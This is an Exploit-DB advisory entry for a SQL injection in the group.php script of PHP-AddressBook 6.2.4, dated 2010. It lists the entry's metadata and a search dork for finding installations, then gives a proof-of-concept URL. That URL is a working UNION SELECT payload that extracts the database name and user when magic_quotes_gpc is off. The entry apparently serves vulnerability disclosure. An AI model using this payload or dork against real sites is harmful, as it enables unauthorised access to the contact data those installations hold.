PHP-AddressBook 6.2.4 - 'group.php' SQL Injection

Author: hiphop
type: webapps
platform: php
port: 
date_added: 2010-12-29  
date_updated: 2010-12-29  
verified: 1  
codes: OSVDB-70219  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comaddressbookv6.2.4.zip  

raw file: 15848.txt  

#Exploit Title    :  PHP-AddressBook v6.2.4 SQL INJECTION VULNERABILITIES
#Script   : PHP-AddressBook v6.2.4
#Language : PHP
#DESCRIPTION:Simple, web-based address & phone book, contact manager, organizer. Groups, addresses, e-Mails, phone numbers & birthdays. vCards, LDIF, Excel, iPhone, Gmail & Google-Maps supported
#Download : http://php-addressbook.sourceforge.net/download
#DORK: "php-addressbook"
#Date     : 2010/12/29
#Found    : by hiphop
#thanks :silly3r


proof of concept:

Condition: magic_quotes_gpc = off

http://server/group.php?group_name=1'+union+select+1,2,3,4,5,6,7,concat(database(),0x3a,user()),9'